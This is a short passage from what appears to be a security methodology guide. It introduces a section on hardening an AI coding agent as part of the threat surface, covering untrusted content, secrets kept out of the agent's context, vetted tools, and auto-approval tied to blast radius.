Skip to main content

Securing the AI Collaborator

In one line: The agent is a powerful but exploitable actor — treat the content it reads as untrusted, keep secrets out of its context, vet the tools it runs, and tie auto-approval to blast radius.

The earlier sections harden what the AI builds. This section hardens the AI itself as part of your threat surface: an agent that reads the open web, runs third-party tools, holds credentials in context, and can take destructive or outward-facing actions. Each rule below names its enforcing mechanism, or is marked "recommended (not yet enforced)" — an aspirational rule no mechanism backs is decoration, the same standard the rest of the methodology holds itself to.